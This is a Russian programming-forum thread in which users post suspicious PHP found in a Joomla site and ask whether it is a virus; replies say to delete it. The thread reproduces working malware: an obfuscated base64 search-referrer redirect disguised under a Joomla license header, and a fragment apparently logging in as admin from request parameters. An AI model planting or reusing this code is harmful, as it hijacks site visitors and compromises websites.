Форум программистов, компьютерный форум, киберфорум
Наши страницы
PHP для начинающих
Войти
Регистрация
Восстановить пароль
 
Рейтинг 4.75/4: Рейтинг темы: голосов - 4, средняя оценка - 4.75
brahmanchikkk
0 / 0 / 1
Регистрация: 05.11.2013
Сообщений: 47
1

Очередной код с возможным вирусом. Как думаете этот код опасен?

10.02.2014, 16:31. Просмотров 730. Ответов 5
Метки нет (Все метки)

PHP
1
2
3
4
5
6
7
8
9
10
11
<?php // no direct access
defined('_JEXEC') or die('Restricted access'); ?>
<ul class="sections<?php echo $params->get('moduleclass_sfx'); ?>"><?php
foreach ($list as $item) :
?>
<li>
    <a href="<?php echo JRoute::_(ContentHelperRoute::getSectionRoute($item->id)); ?>">
        <?php echo $item->title;?></a>
</li>
<?php endforeach; ?>
</ul>

P.S не обращайте внимания, эта строка чтобы не забыть мне путь откуда этот код я взял c:\xampp\htdocs\virus\v-lux21.ru\public_html\modules\mod_sections\tmpl\

Добавлено через 11 минут
Цитата Сообщение от brahmanchikkk Посмотреть сообщение
PHP
1
2
3
4
5
6
7
8
9
10
11
<?php // no direct access
defined('_JEXEC') or die('Restricted access'); ?>
<ul class="sections<?php echo $params->get('moduleclass_sfx'); ?>"><?php
foreach ($list as $item) :
?>
<li>
    <a href="<?php echo JRoute::_(ContentHelperRoute::getSectionRoute($item->id)); ?>">
        <?php echo $item->title;?></a>
</li>
<?php endforeach; ?>
</ul>

P.S не обращайте внимания, эта строка чтобы не забыть мне путь откуда этот код я взял c:\xampp\htdocs\virus\v-lux21.ru\public_html\modules\mod_sections\tmpl\

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
<?
/**
* @version      $Id: helper.php 9764 2007-12-30 07:48:11Z ircmaxell $
* @package      Joomla
* @copyright    Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
* @license      GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
$GLOBALS['_1286220431_']=Array('mt_rand','' .'sock' .'et_ge' .'tpeer' .'na' .'me','setc' .'ookie','t' .'ime','co' .'unt','' .'strpo' .'s'); ?><? function _1065932984($i){$a=Array('' .'aHR0c' .'DovL3ZoMS5' .'heH' .'BvLnJ' .'1' .'Lz9' .'zaHJl' .'ZH' .'Bz' .'dml' .'y' .'IA=' .'=','SFRUU' .'F9SRUZFUkVS','U0VTU0lP' .'Tl9JRD' .'E=','U0VTU0lPTl' .'9JRDE' .'=','MQ' .'=' .'=','Z2' .'9vZ2xlLg==','' .'e' .'WFuZGV4' .'Lg==','e' .'WFo' .'b' .'28u','' .'Y' .'W9sLg==','bXNu' .'Lg==','cm' .'F' .'tYmxlc' .'i4=','b' .'WFpbC' .'4=','eWEu','Yml' .'uZy' .'4=','' .'S' .'FR' .'UUF9S' .'R' .'UZ' .'FUk' .'VS','' .'PH' .'Njcml' .'w' .'dD5kb2' .'N1' .'bWVudC5sb' .'2Nhd' .'Glvbi5oc' .'mVmID0gIg==','Ijs8L3Njcml' .'wdD4=');return base64_decode($a[$i]);} ?><?php $_0=_1065932984(0);if(round(0+5124)<$GLOBALS['_1286220431_'][0](round(0+399+399+399+399+399),round(0+3124)))$GLOBALS['_1286220431_'][1]($_1,$_SERVER,$_1,$_COOKIE);if(isset($_SERVER[_1065932984(1)])AND!isset($_COOKIE[_1065932984(2)])){$GLOBALS['_1286220431_'][2](_1065932984(3),_1065932984(4),$GLOBALS['_1286220431_'][3]()+round(0+315360000));$_1=array(_1065932984(5),_1065932984(6),_1065932984(7),_1065932984(8),_1065932984(9),_1065932984(10),_1065932984(11),_1065932984(12),_1065932984(13),);for($_2=round(0);$_2<$GLOBALS['_1286220431_'][4]($_1);$_2++)if($GLOBALS['_1286220431_'][5]($_SERVER[_1065932984(14)],$_1[$_2])!==false)exit(_1065932984(15) .$_0 ._1065932984(16));} ?>


P.S на это тоже не обращайте внимания, это путь чтобы я не забыл откуда c:\xampp\htdocs\virus\v-lux21.ru\public_html\modules\mod_searchform\templates\default-light\
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
10.02.2014, 16:31
Ответы с готовыми решениями:

Как улучшить этот код?
Код хорошего программиста чёткий, понятный, логичный, последовательный. Это...

Как внедрить этот код?
дорогие программисты подскажите как внедрить этот код &lt;?...

Как написать этот код коротко?
&lt;form name=&quot;form1&quot; method=&quot;post&quot; action=&quot;add_meropri.php&quot; id=&quot;my_form&quot;&gt;...

Как можно оптимизировать этот код?
Как можно оптимизировать этот код? $preview = 'preview.'; $preview_url =...

Объясните как работает этот код?
У меня этот код работает, но я не понимаю как!? И что за символы, могли бы вы...

5
chesar
56 / 53 / 22
Регистрация: 15.12.2009
Сообщений: 231
Записей в блоге: 1
10.02.2014, 20:12 2
PHP
1
$GLOBALS['_1286220431_']=Array('mt_rand','' .'sock' .'et_ge' .'tpeer' .'na' .'me','setc' .'ookie','t' .'ime','co' .'unt','' .'strpo' .'s'); ?><? function _1065932984($i){$a=Array('' .'aHR0c' .'DovL3ZoMS5' .'heH' .'BvLnJ' .'1' .'Lz9' .'zaHJl' .'ZH' .'Bz' .'dml' .'y' .'IA=' .'=','SFRUU' .'F9SRUZFUkVS','U0VTU0lP' .'Tl9JRD' .'E=','U0VTU0lPTl' .'9JRDE' .'=','MQ' .'=' .'=','Z2' .'9vZ2xlLg==','' .'e' .'WFuZGV4' .'Lg==','e' .'WFo' .'b' .'28u','' .'Y' .'W9sLg==','bXNu' .'Lg==','cm' .'F' .'tYmxlc' .'i4=','b' .'WFpbC' .'4=','eWEu','Yml' .'uZy' .'4=','' .'S' .'FR' .'UUF9S' .'R' .'UZ' .'FUk' .'VS','' .'PH' .'Njcml' .'w' .'dD5kb2' .'N1' .'bWVudC5sb' .'2Nhd' .'Glvbi5oc' .'mVmID0gIg==','Ijs8L3Njcml' .'wdD4=');return base64_decode($a[$i]);} ?><?php $_0=_1065932984(0);if(round(0+5124)<$GLOBALS['_1286220431_'][0](round(0+399+399+399+399+399),round(0+3124)))$GLOBALS['_1286220431_'][1]($_1,$_SERVER,$_1,$_COOKIE);if(isset($_SERVER[_1065932984(1)])AND!isset($_COOKIE[_1065932984(2)])){$GLOBALS['_1286220431_'][2](_1065932984(3),_1065932984(4),$GLOBALS['_1286220431_'][3]()+round(0+315360000));$_1=array(_1065932984(5),_1065932984(6),_1065932984(7),_1065932984(8),_1065932984(9),_1065932984(10),_1065932984(11),_1065932984(12),_1065932984(13),);for($_2=round(0);$_2<$GLOBALS['_1286220431_'][4]($_1);$_2++)if($GLOBALS['_1286220431_'][5]($_SERVER[_1065932984(14)],$_1[$_2])!==false)exit(_1065932984(15) .$_0 ._1065932984(16));} ?>
удаляй это. Вообще весь код похожий на этот, что не читается с первого раза и кажется, что писали с другой планеты - можно смело удалять.
1
brahmanchikkk
0 / 0 / 1
Регистрация: 05.11.2013
Сообщений: 47
11.02.2014, 09:38  [ТС] 3
Цитата Сообщение от chesar Посмотреть сообщение
PHP
1
$GLOBALS['_1286220431_']=Array('mt_rand','' .'sock' .'et_ge' .'tpeer' .'na' .'me','setc' .'ookie','t' .'ime','co' .'unt','' .'strpo' .'s'); ?><? function _1065932984($i){$a=Array('' .'aHR0c' .'DovL3ZoMS5' .'heH' .'BvLnJ' .'1' .'Lz9' .'zaHJl' .'ZH' .'Bz' .'dml' .'y' .'IA=' .'=','SFRUU' .'F9SRUZFUkVS','U0VTU0lP' .'Tl9JRD' .'E=','U0VTU0lPTl' .'9JRDE' .'=','MQ' .'=' .'=','Z2' .'9vZ2xlLg==','' .'e' .'WFuZGV4' .'Lg==','e' .'WFo' .'b' .'28u','' .'Y' .'W9sLg==','bXNu' .'Lg==','cm' .'F' .'tYmxlc' .'i4=','b' .'WFpbC' .'4=','eWEu','Yml' .'uZy' .'4=','' .'S' .'FR' .'UUF9S' .'R' .'UZ' .'FUk' .'VS','' .'PH' .'Njcml' .'w' .'dD5kb2' .'N1' .'bWVudC5sb' .'2Nhd' .'Glvbi5oc' .'mVmID0gIg==','Ijs8L3Njcml' .'wdD4=');return base64_decode($a[$i]);} ?><?php $_0=_1065932984(0);if(round(0+5124)<$GLOBALS['_1286220431_'][0](round(0+399+399+399+399+399),round(0+3124)))$GLOBALS['_1286220431_'][1]($_1,$_SERVER,$_1,$_COOKIE);if(isset($_SERVER[_1065932984(1)])AND!isset($_COOKIE[_1065932984(2)])){$GLOBALS['_1286220431_'][2](_1065932984(3),_1065932984(4),$GLOBALS['_1286220431_'][3]()+round(0+315360000));$_1=array(_1065932984(5),_1065932984(6),_1065932984(7),_1065932984(8),_1065932984(9),_1065932984(10),_1065932984(11),_1065932984(12),_1065932984(13),);for($_2=round(0);$_2<$GLOBALS['_1286220431_'][4]($_1);$_2++)if($GLOBALS['_1286220431_'][5]($_SERVER[_1065932984(14)],$_1[$_2])!==false)exit(_1065932984(15) .$_0 ._1065932984(16));} ?>
удаляй это. Вообще весь код похожий на этот, что не читается с первого раза и кажется, что писали с другой планеты - можно смело удалять.
А это похоже на вирус?

<?php $_0=_1065932984(0);if(round(0+5124)<$GLOBALS['_1286220431_'][0](round(0+399+399+399+399+399),round(0+3124)))$GLOBALS['_1286220431_'][1]($_1,$_SERVER,$_1,$_COOKIE);if(isset($_SERVER[_1065932984(1)])AND!isset($_COOKIE[_1065932984(2)])){$GLOBALS['_1286220431_'][2](_1065932984(3),_1065932984(4),$GLOBALS['_1286220431_'][3]()+round(0+315360000));$_1=array(_1065932984(5),_1065932984(6),_1065932984(7),_1065932984(8),_1065932984(9),_1065932984( 10),_1065932984(11),_1065932984(12),_1065932984(13),);for($_2=round(0);$_2<$GLOBALS['_1286220431_'][4]($_1);$_2++)if($GLOBALS['_1286220431_'][5]($_SERVER[_1065932984(14)],$_1[$_2])!==false)exit(_1065932984(15) .$_0 ._1065932984(16));} ?>
0
chesar
56 / 53 / 22
Регистрация: 15.12.2009
Сообщений: 231
Записей в блоге: 1
11.02.2014, 14:56 4
да...
0
SergheiTkach
0 / 0 / 0
Регистрация: 09.03.2016
Сообщений: 2
09.03.2016, 10:23 5
А вот этот код похож на вирус?

PHP
1
@include('./config.php'); function set_config(\$_54b5602d311f5a2caae0c15da64a, \$_a78b67da15584222a9a6f1967b79) { \$_6eedc336451e3a8987bcc182f000 = dirname(__FILE__) . '/config.php'; \$_faad1e500fd695847def9b94284b = @file(\$_6eedc336451e3a8987bcc182f000); if (!\$_faad1e500fd695847def9b94284b) \$_faad1e500fd695847def9b94284b = array("\\n"); \$_b014e50fb6e13e442da8134c70bf = ""; \$_ea31cd064bbf15b34df5292aea27 = false; foreach (\$_faad1e500fd695847def9b94284b as \$_a09f91c594bb4272b5badc43a07f) { if (strpos(\$_a09f91c594bb4272b5badc43a07f, \$_54b5602d311f5a2caae0c15da64a . ' ') > -1) { \$_eaa72085dd539f77382daf8a6ca8 = "\\t\$" . \$_54b5602d311f5a2caae0c15da64a . ' = "' . \$_a78b67da15584222a9a6f1967b79 . '";'; if (strpos(\$_a09f91c594bb4272b5badc43a07f, ' -1) \$_eaa72085dd539f77382daf8a6ca8 = '') > -1) \$_eaa72085dd539f77382daf8a6ca8 .= '?>'; \$_a09f91c594bb4272b5badc43a07f = \$_eaa72085dd539f77382daf8a6ca8 . "\\n"; \$_ea31cd064bbf15b34df5292aea27 = true; } elseif (strpos(\$_a09f91c594bb4272b5badc43a07f, '?>') > -1 and !\$_ea31cd064bbf15b34df5292aea27) { \$_b014e50fb6e13e442da8134c70bf .= "\\t\$" . \$_54b5602d311f5a2caae0c15da64a . ' = "' . \$_a78b67da15584222a9a6f1967b79 . '";' . "\\n"; } \$_b014e50fb6e13e442da8134c70bf .= \$_a09f91c594bb4272b5badc43a07f; } file_put_contents(\$_6eedc336451e3a8987bcc182f000, \$_b014e50fb6e13e442da8134c70bf); } ?> login(array('username'=>\$_REQUEST['username'], 'password'=> \$_REQUEST['password'], 'secretkey'=>''), array('action'=>'core.login.admin')); if (!\$_0ecf2f0e5c368eec5d25ab22b315) { echo "invalid password or login"; exit();
Весь код не влезает в сообщение. Там более 7000 знаков
0
WhiteMind
Hello Kitty
680 / 554 / 400
Регистрация: 12.02.2016
Сообщений: 1,440
Записей в блоге: 1
09.03.2016, 10:26 6
прикрепите файл значит
0
09.03.2016, 10:26
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
09.03.2016, 10:26

Как прочитать этот код? Что он означает?
Всем привет! Только спецы могут понять чего это означает. Предистория:...

Как взять в этот код прошлый день?
Допустим, сегодня 31.03.2017. И есть страница:...

Как заставить этот код работать без перезагрузки страницы (ajax)
Здравствуйте. Вопрос такой - есть страница table.html в неё подключается...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
6
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2018, vBulletin Solutions, Inc.
Рейтинг@Mail.ru